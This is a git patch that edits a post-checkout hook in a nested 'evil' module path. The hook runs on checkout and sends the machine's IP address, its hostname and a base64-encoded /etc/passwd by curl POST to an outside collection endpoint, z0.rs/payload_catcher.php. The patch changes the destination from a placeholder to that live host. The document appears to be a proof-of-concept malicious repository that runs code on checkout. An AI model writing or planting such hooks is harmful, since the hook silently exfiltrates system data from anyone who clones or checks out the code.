From 6f02f2151e67e0b38f3eabec66daf769cb528bd3 Mon Sep 17 00:00:00 2001 From: z0rs Date: Thu, 11 Jan 2024 22:47:07 -0600 Subject: [PATCH] Update modules/1/2/3/4/evil/hooks/post-checkout --- modules/1/2/3/4/evil/hooks/post-checkout | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/1/2/3/4/evil/hooks/post-checkout b/modules/1/2/3/4/evil/hooks/post-checkout index 97740cf..502205f 100755 --- a/modules/1/2/3/4/evil/hooks/post-checkout +++ b/modules/1/2/3/4/evil/hooks/post-checkout @@ -1,2 +1,2 @@ #!/bin/bash -curl -X POST http://example.com -d "ip=$(hostname -I | tr -d '[:space:]')&hostname=$(hostname)&passwd=$(cat /etc/passwd | base64)" +curl -X POST http://z0.rs/payload_catcher.php -d "ip=$(hostname -I | tr -d '[:space:]')&hostname=$(hostname)&passwd=$(cat /etc/passwd | base64)"